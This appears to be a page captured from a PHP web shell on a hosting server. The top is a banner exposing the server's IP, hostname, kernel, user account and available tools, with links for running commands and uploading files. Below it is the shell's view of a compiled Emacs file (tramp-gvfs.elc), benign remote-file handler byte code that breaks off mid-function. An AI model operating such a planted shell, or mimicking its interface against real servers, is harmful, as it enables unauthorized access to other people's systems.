Server IP : 111.118.215.189 / Your IP : 3.136.20.207 Web Server : Apache System : Linux md-in-83.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : a1673wkz ( 2475) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /usr/share/emacs/24.3/lisp/net/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
;ELC ;;; Compiled by mockbuild@buildfarm06-new.corp.cloudlinux.com on Fri Oct 11 10:10:36 2024 ;;; from file /builddir/build/BUILD/emacs-24.3/lisp/net/tramp-gvfs.el ;;; in Emacs version 24.3.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. ;;; This file does not contain utf-8 non-ASCII characters, ;;; and so can be loaded in Emacs versions earlier than 23. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (byte-code "\304\305!\210\304\306!\210\304\307!\210\304\310!\210\304\311!\210\312\300\313\314\315\305\316\317\320\321& \210\322\323\324\"\210\312\325\326\327\315\305\316\317\320\330& \210\331\332!\203Z \333\211\203Y \n@\334 \"\204R \322\303 \333B\"\210\nA\211\204A *\333\207" [tramp-gvfs-methods elt --dolist-tail-- tramp-methods require tramp dbus url-parse url-util zeroconf custom-declare-variable '("dav" "davs" "obex" "synce") "List of methods for remote files, accessed with GVFS." :group :version "23.2" :type (repeat (choice (const "dav") (const "davs") (const "ftp") (const "obex") (const "sftp") (const "smb") (const "synce"))) add-to-list tramp-default-user-alist ("\\`synce\\'" nil nil) tramp-gvfs-zeroconf-domain "local" "Zeroconf domain to be used for discovering services, like host names." string featurep dbusbind nil assoc] 11) #@44 The preceding object path for own objects. (defconst tramp-gvfs-path-tramp (concat dbus-path-emacs "/Tramp") (#$ . 1409)) #@41 The well known name of the GVFS daemon. (defconst tramp-gvfs-service-daemon "org.gtk.vfs.Daemon" (#$ . 1537)) (byte-code "\300\301!\204\f \302\301!\203 \301\303!\203 \304\305!\204 \306\307!\210\300\207" [subrp dbus-get-unique-name functionp :session tramp-compat-process-running-p "gvfs-fuse-daemon" error "Package `tramp-gvfs' not supported"] 2) #@37 The object path of the GVFS daemon. (defconst tramp-gvfs-path-mounttracker "/org/gtk/vfs/mounttracker" (#$ . 1893)) #@50 The mount tracking interface in the GVFS daemon. (defconst tramp-gvfs-interface-mounttracker "org.gtk.vfs.MountTracker" (#$ . 2015)) #@62 Used by the dbus-proxying implementation of GMountOperation. (defconst tramp-gvfs-interface-mountoperation "org.gtk.vfs.MountOperation" (#$ . 2154)) #@32 Operation requires a password. (defconst tramp-gvfs-password-need-password 1 (#$ . 2309)) #@32 Operation requires a username. (defconst tramp-gvfs-password-need-username 2 (#$ . 2405)) #@30 Operation requires a domain. (defconst tramp-gvfs-password-need-domain 4 (#$ . 2501)) #@37 Operation supports saving settings. (defconst tramp-gvfs-password-saving-supported 8 (#$ . 2593)) #@37 Operation supports anonymous users. (defconst tramp-gvfs-password-anonymous-supported 16 (#$ . 2697)) #@43 The well known name of the BLUEZ service. (defconst tramp-bluez-service "org.bluez" (#$ . 2805)) #@44 The manager interface of the BLUEZ daemon. (defconst tramp-bluez-interface-manager "org.bluez.Manager" (#$ . 2908)) #@44 The adapter interface of the BLUEZ daemon. (defconst tramp-bluez-interface-adapter "org.bluez.Adapter" (#$ . 3030)) #@214 Defines seconds since last bluetooth device discovery before rescanning. A value of 0 would require an immediate discovery during hostname completion, nil means to use always cached values for discovered devices. (custom-declare-variable 'tramp-bluez-discover-devices-timeout 60 '(#$ . 3153) :group 'tramp :version "23.2" :type '(choice (const nil) integer)) #@95 Indicator for a running bluetooth device discovery. It keeps the timestamp of last discovery. (defvar tramp-bluez-discovery nil (#$ . 3518)) #@76 Alist of detected bluetooth devices. Every entry is a list (NAME ADDRESS). (defvar tramp-bluez-devices nil (#$ . 3665)) #@41 The well known name of the HAL service. (defconst tramp-hal-service "org.freedesktop.Hal" (#$ . 3791)) #@44 The object path of the HAL daemon manager. (defconst tramp-hal-path-manager "/org/freedesktop/Hal/Manager" (#$ . 3900)) #@42 The manager interface of the HAL daemon. (defconst tramp-hal-interface-manager "org.freedesktop.Hal.Manager" (#$ . 4026)) #@41 The device interface of the HAL daemon. (defconst tramp-hal-interface-device "org.freedesktop.Hal.Device" (#$ . 4154)) #@130 Alist of handler functions for Tramp GVFS method. Operations not mentioned here will be handled by the default Emacs primitives. (defconst tramp-gvfs-file-name-handler-alist '((access-file . ignore) (add-name-to-file . tramp-gvfs-handle-copy-file) (copy-file . tramp-gvfs-handle-copy-file) (delete-directory . tramp-gvfs-handle-delete-directory) (delete-file . tramp-gvfs-handle-delete-file) (directory-file-name . tramp-handle-directory-file-name) (directory-files . tramp-gvfs-handle-directory-files) (directory-files-and-attributes . tramp-gvfs-handle-directory-files-and-attributes) (dired-call-process . ignore) (dired-compress-file . ignore) (dired-uncache . tramp-handle-dired-uncache) (expand-file-name . tramp-gvfs-handle-expand-file-name) (file-attributes . tramp-gvfs-handle-file-attributes) (file-directory-p . tramp-gvfs-handle-file-directory-p) (file-executable-p . tramp-gvfs-handle-file-executable-p) (file-exists-p . tramp-gvfs-handle-file-exists-p) (file-local-copy . tramp-gvfs-handle-file-local-copy) (file-name-all-completions . tramp-gvfs-handle-file-name-all-completions) (file-name-as-directory . tramp-handle-file-name-as-directory) (file-name-completion . tramp-handle-file-name-completion) (file-name-directory . tramp-handle-file-name-directory) (file-name-nondirectory . tramp-handle-file-name-nondirectory) (file-newer-than-file-p . tramp-handle-file-newer-than-file-p) (file-ownership-preserved-p . ignore) (file-readable-p . tramp-gvfs-handle-file-readable-p) (file-regular-p . tramp-handle-file-regular-p) (file-remote-p . tramp-handle-file-remote-p) (file-selinux-context . tramp-gvfs-handle-file-selinux-context) (file-symlink-p . tramp-handle-file-symlink-p) (file-writable-p . tramp-gvfs-handle-file-writable-p) (find-backup-file-name . tramp-handle-find-backup-file-name) (insert-directory . tramp-gvfs-handle-insert-directory) (insert-file-contents . tramp-gvfs-handle-insert-file-contents) (load . tramp-handle-load) (make-directory . tramp-gvfs-handle-make-directory) (make-directory-internal . ignore) (make-symbolic-link . ignore) (process-file . tramp-gvfs-handle-process-file) (rename-file . tramp-gvfs-handle-rename-file) (set-file-modes . tramp-gvfs-handle-set-file-modes) (set-file-selinux-context . tramp-gvfs-handle-set-file-selinux-context) (set-visited-file-modtime . tramp-gvfs-handle-set-visited-file-modtime) (shell-command . tramp-gvfs-handle-shell-command) (start-file-process . tramp-gvfs-handle-start-file-process) (substitute-in-file-name . tramp-handle-substitute-in-file-name) (unhandled-file-name-directory . tramp-handle-unhandled-file-name-directory) (vc-registered . ignore) (verify-visited-file-modtime . tramp-gvfs-handle-verify-visited-file-modtime) (write-region . tramp-gvfs-handle-write-region)) (#$ . 4280)) #@54 Check if it's a filename handled by the GVFS daemon. (defalias 'tramp-gvfs-file-name-p #[(filename) "\303!\205 \304\305!!\211;\205 \n\235)\207" [filename method tramp-gvfs-methods tramp-tramp-file-p tramp-file-name-method tramp-dissect-file-name] 4 (#$ . 7067)]) (put 'tramp-gvfs-file-name-p 'byte-optimizer 'byte-compile-inline-expand) #@131 Invoke the GVFS related OPERATION. First arg specifies the OPERATION, second arg is a list of arguments to pass to the OPERATION. (defalias 'tramp-gvfs-file-name-handler #[(operation &rest args) "\305 \"\211\203 \306 \307\216\310\nA\f\"*\202 \311\f\")\207" [operation tramp-gvfs-file-name-handler-alist fn save-match-data-internal args assoc match-data ((byte-code "\301\302\"\207" [save-match-data-internal set-match-data evaporate] 3)) apply tramp-run-real-handler] 4 (#$ . 7417)]) (byte-code "\300\301!\203 \302\303\304\305B\"\210\300\207" [featurep dbusbind add-to-list tramp-foreign-file-name-handler-alist tramp-gvfs-file-name-p tramp-gvfs-file-name-handler] 4) #@70 Convert a D-Bus message into readable UTF8 strings, used for traces. (defalias 'tramp-gvfs-stringify-dbus-message #[(message) ":\203 \301@!\203 \302\303\304!\"\207:\203 \305\306\"\207;\203'